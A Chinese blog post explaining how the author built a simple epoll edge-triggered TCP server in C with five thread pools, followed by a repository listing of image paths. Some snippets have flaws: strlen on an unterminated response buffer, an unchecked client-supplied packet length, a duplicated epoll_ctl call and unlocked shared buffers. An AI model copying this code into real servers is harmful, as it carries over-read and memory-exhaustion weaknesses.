| 怎么从无到有写一个好的TCP Server 2 | ================================ 3 | 4 | ### 前言 5 |   很久以前在看Libevent的源码,然后研究怎么写一个完整的高性能的TCP Server,之后由于兴之所至研究Collective Intelligence然后搁置了很长一段时间,这两天就写了一个简易的,单机QPS绝对不会低,感兴趣希望帮忙测一下。 6 | 7 | ### TCP参数以及EPOLLET 8 |   为什么用Nonblocking和EPOLLET?原因之一是减少`epoll_wait`调用次数,这样也就减少了系统调用的次数,这样socket上的事件只会通知一次。对于listen socket,需要一直`accept`直到`errno`变为`EAGAIN`;对于连接socket,也需要一直`read`直到`errno`变为`EAGAIN`,这样就避免了数据的丢失。还有一点就是,可以多个thread同时`epoll_wait`同一个`epoll fd`,由于是ET模式,所有事件只会通知一次,所以不会引起spurious wakeup,这样可以利用multi-core来提升整体性能,本例中并没有实现这一点。 9 |   通过启用`TCP_NODELAY`来禁用Nagel算法,TCP默认是启用了Nagel算法的,对于需要快速响应的Server来说,禁用Nagel总是好的。还有一点就是TCP默认有一个ACK捎带的模式,即ACK并不是立即返回给另一方,可能会随着数据的返回而捎带过去,这样和Nagel一起使用会造成更长的延时,所以禁用Nagel就好。启用`TCP_DEFER_ACCEPT`,启用此选项的考虑点非常简单,当连接建立的时候,我们并不以为连接已经建立,而是当收到数据的时候才认为连接已经建立,这样对于不发数据但是建立了连接的client,不会加入到epoll监听,节省系统资源。同时,调用`accept`后,新加入监听的连接也会立刻产生EPOLLIN事件,因为buffer里已经有数据可读。 10 | 11 | ### 关于协议设计 12 |   起初我是打算将buffer这一层单独抽离出来做一层,基于此的考虑是TCP只是提供一个连续不断的流,而且TCP是全双工的。无论是业务还是Write都不可以打断我的Read。这样上层只需要做一个thread不断去buffer这一层切割完整的packet,做业务处理和Write就行,这样设计比较自然,但是越想越复杂就换了比较通用的`length|data`的设计。`length|data`的设计需要client遵守这个约定,要么将`length|data`封装成结构体,一次性Write,要么将使用`TCP_CORK`一次发送整个物理包,要么使用scatter/gather IO,即`readv/writev`。 13 | 14 | ### 线程池设计 15 |   如果将Server的行为拆分开来,大致可以分为5个:新建连接 => 读 => 请求处理 => 写,其间可以穿插错误处理。为了不让某个行为阻断另一个行为,举个例子,如果我建立了大小为8的线程池同时处理这五种行为,我请求处理的可能很慢,这样所有任务都会Hang死在请求处理这,所以为了避免处理速度不一致的情况将其拆分成五个线程池,这样也可以根据各个行为的耗时情况调整线程池的大小。 16 | 17 | ### 代码片段 18 | 五个线程池 19 | ```c 20 | read_threadpool = threadpool_create(8, MAX_EVENTS, 0); 21 | write_threadpool = threadpool_create(8, MAX_EVENTS, 0); 22 | listener_threadpool = threadpool_create(1, MAX_EVENTS, 0); 23 | error_threadpool = threadpool_create(2, MAX_EVENTS, 0); 24 | worker_threadpool = threadpool_create(8, MAX_EVENTS * 2, 0); 25 | ``` 26 | 27 | 对socket的简单封装,listen socket设置成NONBLOCK符合ET的设计。 28 | ```c 29 | int ss_socket() { 30 | int sock = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); 31 | if (sock == -1) 32 | abort("create socket error"); 33 | 34 | struct sockaddr_in serv_addr; 35 | memset(&serv_addr, 0, sizeof(serv_addr)); 36 | serv_addr.sin_family = AF_INET; 37 | serv_addr.sin_port = htons(PORT); 38 | serv_addr.sin_addr.s_addr = INADDR_ANY; 39 | 40 | set_reuseaddr(sock); 41 | set_tcp_defer_accept(sock); 42 | 43 | int ret = bind(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); 44 | if (ret == -1) 45 | abort("bind socket error"); 46 | 47 | ret = listen(sock, BACKLOG); 48 | if (ret == -1) 49 | abort("listen socket error"); 50 | 51 | return sock; 52 | } 53 | ``` 54 | 55 | 事件循环,这里踩过这么一个坑,`epoll_data`是一个union的结构,我还以为是一个结构体,然后`void *ptr`是一个存private data的指针,在这里堵了好久。我们不要使用`epoll_data.fd`,反而使用`epoll_data.ptr`,这样更灵活,而且能确保每一个连接共享一个我自定义的`ep_data_t`的结构。但是你会发现代码里并没有加锁,其实考虑的初衷是这样的:对于单一连接,正常的通信是一问一答的模式,如果偏离这种模式的话则需要对`ep_data_t`里的buffer加锁。 56 | ```c 57 | void event_loop() { 58 | int listener = ss_socket(); 59 | int epfd = ss_epoll_create(); 60 | log("epollfd: %d\tlistenfd: %d", epfd, listener); 61 | ep_data_t *listener_data = (ep_data_t *)ss_malloc(sizeof(ep_data_t)); 62 | listener_data->epfd = epfd; 63 | listener_data->eventfd = listener; 64 | struct epoll_event ev_listener; 65 | ev_listener.data.ptr = listener_data; 66 | ev_listener.events = EPOLLIN | EPOLLET; 67 | ss_epoll_ctl(epfd, EPOLL_CTL_ADD, listener, &ev_listener); 68 | epoll_ctl(epfd, EPOLL_CTL_ADD, listener, &ev_listener); 69 | struct epoll_event events[MAX_EVENTS]; 70 | for (;;) { 71 | int nfds = ss_epoll_wait(epfd, events, MAX_EVENTS); 72 | for (int i = 0; i < nfds; ++i) { 73 | log("current eventfd: %d", ((ep_data_t *)events[i].data.ptr)->eventfd); 74 | if (((ep_data_t *)events[i].data.ptr)->eventfd == listener) { 75 | log("listenfd event."); 76 | threadpool_add(listener_threadpool, do_accept, events[i].data.ptr, 0); 77 | } else { 78 | if (events[i].events & EPOLLIN) { 79 | log("read event."); 80 | threadpool_add(read_threadpool, do_read, events[i].data.ptr, 0); 81 | } 82 | if (events[i].events & EPOLLOUT) { 83 | log("write event."); 84 | threadpool_add(write_threadpool, do_write, events[i].data.ptr, 0); 85 | } 86 | if (events[i].events & EPOLLERR | events[i].events & EPOLLHUP) { 87 | log("close event."); 88 | threadpool_add(error_threadpool, do_close, events[i].data.ptr, 0); 89 | } 90 | } 91 | } 92 | } 93 | } 94 | ``` 95 | 96 | 新建连接处理,每次有连接建立就循环`accpet`直到所有连接处理完,符合ET设计。这里事件并不设置EPOLLOUT,还有就是packet的设计,由于TCP只提供连续的流,所以我们收到的packet可能只是一个chunck。再就是这里的`EPOLLRDHUP`,很便于ET模式处理关闭的socket,`read`反0和这个只能二选一。 97 | ```c 98 | void do_accept(void *arg) { 99 | ep_data_t *data = (ep_data_t *)arg; 100 | struct sockaddr_in client; 101 | socklen_t addrlen = sizeof(client); 102 | while (true) { 103 | int conn = accept4(data->eventfd, (struct sockaddr *)&client, &addrlen, SOCK_NONBLOCK); 104 | if (conn == -1) { 105 | if (errno == EAGAIN) 106 | break; 107 | abort("accpet4 error"); 108 | } 109 | char ip[IPLEN]; 110 | inet_ntop(AF_INET, &client.sin_addr, ip, IPLEN); 111 | log("new connection from %s, fd: %d", ip, conn); 112 | 113 | struct epoll_event event; 114 | //event.events = EPOLLIN | EPOLLOUT | EPOLLRDHUP; //shouldn't include EPOLLOUT ' 115 | event.events = EPOLLIN | EPOLLET; 116 | ep_data_t *ep_data = (ep_data_t *)ss_malloc(sizeof(ep_data_t)); 117 | ep_data->epfd = data->epfd; 118 | ep_data->eventfd = conn; 119 | ep_data->packet_state = PACKET_START; 120 | ep_data->read_callback = handle_request; /* callback for request */ 121 | ep_data->write_callback = handle_response; /* callback for response */ 122 | event.data.ptr = ep_data; 123 | ss_epoll_ctl(data->epfd, EPOLL_CTL_ADD, conn, &event); 124 | log("add event for fd: %d", conn); 125 | } 126 | } 127 | ``` 128 | 129 | Read处理,一直读直到`EAGAIN`,每读到一个完整的packet就送去request线程池,避免其阻塞Read。没读完就标记为CHUNCK,等待下一次读取。当read返回0的时候说明对方已经关闭了连接。 130 | ```c 131 | void do_read(void *arg) { 132 | log("enter do_read"); 133 | ep_data_t *data = (ep_data_t *)arg; 134 | while (true) { 135 | if (data->packet_state == PACKET_START) { 136 | uint32_t length; 137 | int ret = read(data->eventfd, &length, sizeof(length)); 138 | if (ret == -1) { 139 | if (errno == EAGAIN) { 140 | break; // no more data to read 141 | } 142 | err("read error for %d", data->eventfd); 143 | return; 144 | } 145 | log("packet length: %d", length); 146 | if (length == 0) {/* socket need to be closed */ 147 | do_close(data); 148 | break; 149 | } 150 | data->ep_read_buffer.length = length; 151 | data->ep_read_buffer.buffer = (char *)ss_malloc(length); 152 | data->ep_read_buffer.count = 0; 153 | } 154 | int count = read(data->eventfd, data->ep_read_buffer.buffer + data->ep_read_buffer.count 155 | , data->ep_read_buffer.length - data->ep_read_buffer.count); 156 | if (count == 0) { 157 | do_close(data); /* socket need to be closed */ 158 | break; 159 | } 160 | if (count == -1) { 161 | if (errno == EAGAIN) { 162 | break; /* no more data to read */ 163 | } 164 | err("read error for %d", data->eventfd); 165 | return; 166 | } 167 | data->ep_read_buffer.count += count; 168 | if (data->ep_read_buffer.count < data->ep_read_buffer.length) { 169 | data->packet_state = PACKET_CHUNCK; 170 | } else { 171 | data->packet_state = PACKET_START; /* reset to PACKET_START to recv new packet */ 172 | //data->read_callback(data); /* should not block read thread */ 173 | request_t *req = (request_t *)ss_malloc(sizeof(request_t)); 174 | req->ep_data = data; 175 | req->length = data->ep_read_buffer.length; 176 | req->buffer = (char *)ss_malloc(data->ep_read_buffer.length); 177 | memcpy(req->buffer, data->ep_read_buffer.buffer, req->length); 178 | threadpool_add(worker_threadpool, data->read_callback, (void *)req, 0); 179 | } 180 | } 181 | } 182 | ``` 183 | 184 | 请求处理,这里的处理很简单,client说什么,然后在其内容前加一个 "Hi there, you just said: "。 185 | ```c 186 | void handle_request(void *data) { 187 | request_t *req = (request_t *)data; 188 | char *resp = (char *)ss_malloc(req->length + 1024); 189 | const char *msg = "Hi there, you just said: "; 190 | memcpy(resp, msg, strlen(msg)); 191 | memcpy(resp + strlen(msg), req->buffer, req->length); 192 | response(req, resp, strlen(resp)); 193 | ss_free(resp); 194 | } 195 | ``` 196 | 197 | response函数,只是简单的做write buffer的处理,加上`EPOLLOUT`事件,告诉其可以写了,因为TCP是全双工的,所以要一直是监控可读状态。 198 | ```c 199 | void response(request_t *req, char *resp, uint32_t length) { 200 | ep_data_t *data = req->ep_data; 201 | data->ep_write_buffer.buffer = (char *)ss_malloc(length); 202 | memcpy(data->ep_write_buffer.buffer, resp, length); 203 | data->ep_write_buffer.length = length; 204 | struct epoll_event event; 205 | event.data.fd = data->eventfd; 206 | event.data.ptr = data; 207 | event.events = EPOLLIN | EPOLLOUT | EPOLLET | EPOLLRDHUP; /* we should always allow read */ 208 | ss_epoll_ctl(data->epfd, EPOLL_CTL_MOD, data->eventfd, &event); 209 | ss_free(req->buffer); 210 | ss_free(req); 211 | } 212 | ``` 213 | 214 | Write处理,write同样要一直写到`EAGAIN`为止,没写完的的接着写,写完了重置write buffer。 215 | ```c 216 | void do_write(void *arg) { 217 | ep_data_t *data = (ep_data_t *)arg; 218 | while (true) { 219 | int count = write(data->eventfd, data->ep_write_buffer.buffer + data->ep_write_buffer.co 220 | unt, data->ep_write_buffer.length - data->ep_write_buffer.count); 221 | if (count == -1) { 222 | if (errno == EAGAIN) { 223 | break; /* wait for next write */ 224 | } 225 | err("write error for %d", data->eventfd); 226 | return; 227 | } 228 | data->ep_write_buffer.count += count; 229 | if (data->ep_write_buffer.count < data->ep_write_buffer.length) { 230 | /* write not finished, wait for next write */ 231 | } else { 232 | //data->write_callback(data); /* should not block write */ 233 | threadpool_add(worker_threadpool, data->write_callback, NULL, 0); 234 | reset_epdata(data); 235 | break; 236 | } 237 | } 238 | } 239 | ``` 240 | 241 | reset\_epdata函数,释放buffer的内存,并将该socket事件监听改为读。 242 | ```c 243 | void reset_epdata(ep_data_t *data) { 244 | ss_free(data->ep_write_buffer.buffer); 245 | ss_free(data->ep_read_buffer.buffer); 246 | memset(&data->ep_write_buffer, 0, sizeof(data->ep_write_buffer)); 247 | memset(&data->ep_read_buffer, 0, sizeof(data->ep_read_buffer)); 248 | /* remove write event */ 249 | struct epoll_event event; 250 | event.data.ptr = (void *)data; 251 | event.events = EPOLLIN | EPOLLET; 252 | ss_epoll_ctl(data->epfd, EPOLL_CTL_MOD, data->eventfd, &event); 253 | } 254 | ``` 255 | 256 | do\_close函数,关闭连接,去掉监听。 257 | ```c 258 | void do_close(void *arg) { 259 | log("do close, free data!"); 260 | ep_data_t *data = (ep_data_t *)arg; 261 | if (data != NULL) { 262 | ss_epoll_ctl(data->epfd, EPOLL_CTL_DEL, data->eventfd, NULL); 263 | close(data->eventfd); 264 | if (data->ep_read_buffer.buffer != NULL) 265 | ss_free(data->ep_read_buffer.buffer); 266 | if (data->ep_write_buffer.buffer != NULL) 267 | ss_free(data->ep_write_buffer.buffer); 268 | ss_free(data); 269 | } 270 | } 271 | ``` 272 | 273 | [所有代码在这个](https://github.com/linghuazaii/Simple-Server) 274 | 275 | ### 补充说明 276 |   我比较懒,没有将文件分开写。设计上请求处理函数和处理完后的通知函数都设计成了callback,所以如果进行一个完整封装的话,只有`handle_request`和`handle_response`函数是对上层可见的。这样基于此又可以设计更多样的上层协议,无论是做RPC也好还是做其他的也好,我也正打算用这个简易的server写一个服务发现的server,然后可以写一个简易的分布式cache,然后可以写一个简易的http server,后端的这一套就算基本齐全了吧。 277 | 278 | ### Note 279 |   **GOOD LUCK, HAVE FUN!** 280 | -------------------------------------------------------------------------------- /image/active_object/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/active_object/.keep -------------------------------------------------------------------------------- /image/active_object/active_object_design.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/active_object/active_object_design.png -------------------------------------------------------------------------------- /image/active_object/result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/active_object/result.png -------------------------------------------------------------------------------- /image/c-hello-world/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/.gitkeep -------------------------------------------------------------------------------- /image/c-hello-world/Register386.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/Register386.png -------------------------------------------------------------------------------- /image/c-hello-world/a.out-symbol.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/a.out-symbol.png -------------------------------------------------------------------------------- /image/c-hello-world/exit-instruction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/exit-instruction.png -------------------------------------------------------------------------------- /image/c-hello-world/instruction.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/instruction.png -------------------------------------------------------------------------------- /image/c-hello-world/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/main.png -------------------------------------------------------------------------------- /image/c-hello-world/memory-model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/memory-model.png -------------------------------------------------------------------------------- /image/c-hello-world/reverse-a.out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/reverse-a.out.png -------------------------------------------------------------------------------- /image/c-hello-world/reverse-test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/reverse-test.png -------------------------------------------------------------------------------- /image/c-hello-world/test.asm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/c-hello-world/test.asm.png -------------------------------------------------------------------------------- /image/machine-learning/backpropagation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/backpropagation.png -------------------------------------------------------------------------------- /image/machine-learning/big_learning_rate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/big_learning_rate.png -------------------------------------------------------------------------------- /image/machine-learning/cost.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/cost.JPG -------------------------------------------------------------------------------- /image/machine-learning/cost_pic01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/cost_pic01.png -------------------------------------------------------------------------------- /image/machine-learning/cost_pic02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/cost_pic02.png -------------------------------------------------------------------------------- /image/machine-learning/covariance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/covariance.png -------------------------------------------------------------------------------- /image/machine-learning/entropy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/entropy.png -------------------------------------------------------------------------------- /image/machine-learning/euclidean_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/euclidean_distance.png -------------------------------------------------------------------------------- /image/machine-learning/example_gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/example_gradient.png -------------------------------------------------------------------------------- /image/machine-learning/function.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/function.png -------------------------------------------------------------------------------- /image/machine-learning/gini_impurity.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gini_impurity.png -------------------------------------------------------------------------------- /image/machine-learning/gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gradient.png -------------------------------------------------------------------------------- /image/machine-learning/gradient_descent.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/gradient_descent.JPG -------------------------------------------------------------------------------- /image/machine-learning/hidden-layer-30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/hidden-layer-30.png -------------------------------------------------------------------------------- /image/machine-learning/hx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/hx.png -------------------------------------------------------------------------------- /image/machine-learning/k-means.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/k-means.png -------------------------------------------------------------------------------- /image/machine-learning/linear-regression-form.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/linear-regression-form.png -------------------------------------------------------------------------------- /image/machine-learning/linear_example.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/linear_example.JPG -------------------------------------------------------------------------------- /image/machine-learning/logistic_regression_cost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/logistic_regression_cost.png -------------------------------------------------------------------------------- /image/machine-learning/logistic_regression_cost_gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/logistic_regression_cost_gradient.png -------------------------------------------------------------------------------- /image/machine-learning/mse.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/mse.png -------------------------------------------------------------------------------- /image/machine-learning/pearson_correlation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/pearson_correlation.png -------------------------------------------------------------------------------- /image/machine-learning/regular_logistic_regression_cost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/regular_logistic_regression_cost.png -------------------------------------------------------------------------------- /image/machine-learning/regular_logistic_regression_cost_gradient.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/regular_logistic_regression_cost_gradient.png -------------------------------------------------------------------------------- /image/machine-learning/sigmoid_function.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/sigmoid_function.png -------------------------------------------------------------------------------- /image/machine-learning/standard_deviation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/standard_deviation.png -------------------------------------------------------------------------------- /image/machine-learning/train.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/train.png -------------------------------------------------------------------------------- /image/machine-learning/train2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/train2.png -------------------------------------------------------------------------------- /image/machine-learning/word_vector.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/machine-learning/word_vector.png -------------------------------------------------------------------------------- /image/memory_management/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/.keep -------------------------------------------------------------------------------- /image/memory_management/heapAllocation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/heapAllocation.png -------------------------------------------------------------------------------- /image/memory_management/heapMapped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/heapMapped.png -------------------------------------------------------------------------------- /image/memory_management/kernelUserMemorySplit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/kernelUserMemorySplit.png -------------------------------------------------------------------------------- /image/memory_management/linuxClassicAddressSpaceLayout.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/linuxClassicAddressSpaceLayout.png -------------------------------------------------------------------------------- /image/memory_management/linuxFlexibleAddressSpaceLayout.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/linuxFlexibleAddressSpaceLayout.png -------------------------------------------------------------------------------- /image/memory_management/malloc_chunk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/malloc_chunk.png -------------------------------------------------------------------------------- /image/memory_management/mappingBinaryImage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/mappingBinaryImage.png -------------------------------------------------------------------------------- /image/memory_management/memoryDescriptorAndMemoryAreas.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/memoryDescriptorAndMemoryAreas.png -------------------------------------------------------------------------------- /image/memory_management/mm_struct.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/mm_struct.png -------------------------------------------------------------------------------- /image/memory_management/pagedVirtualSpace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/pagedVirtualSpace.png -------------------------------------------------------------------------------- /image/memory_management/virtualMemoryInProcessSwitch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/virtualMemoryInProcessSwitch.png -------------------------------------------------------------------------------- /image/memory_management/x86PageTableEntry4KB.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/memory_management/x86PageTableEntry4KB.png -------------------------------------------------------------------------------- /image/peterson_lock/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/peterson_lock/.keep -------------------------------------------------------------------------------- /image/peterson_lock/peterson_gdb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/peterson_lock/peterson_gdb.png -------------------------------------------------------------------------------- /image/pthreads/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/.keep -------------------------------------------------------------------------------- /image/pthreads/NUMA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/NUMA.png -------------------------------------------------------------------------------- /image/pthreads/UMA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/UMA.png -------------------------------------------------------------------------------- /image/pthreads/cpu_cache.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/cpu_cache.png -------------------------------------------------------------------------------- /image/pthreads/multi_processor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/pthreads/multi_processor.png -------------------------------------------------------------------------------- /image/stackoverflow/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/.keep -------------------------------------------------------------------------------- /image/stackoverflow/getenv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/getenv.png -------------------------------------------------------------------------------- /image/stackoverflow/main_assembly.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/main_assembly.png -------------------------------------------------------------------------------- /image/stackoverflow/ret_addr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/ret_addr.png -------------------------------------------------------------------------------- /image/stackoverflow/variable_distance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/stackoverflow/variable_distance.png -------------------------------------------------------------------------------- /image/syn-flood/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/.gitkeep -------------------------------------------------------------------------------- /image/syn-flood/backlog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/backlog.png -------------------------------------------------------------------------------- /image/syn-flood/half-connection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/half-connection.png -------------------------------------------------------------------------------- /image/syn-flood/ip_header.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/ip_header.png -------------------------------------------------------------------------------- /image/syn-flood/ip_packat_sample.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/linghuazaii/blog/1857d5e7a72b0123ce58de2e3cf18da0ef22b707/image/syn-flood/ip_packat_sample.png -------------------------------------------------------------------------------- 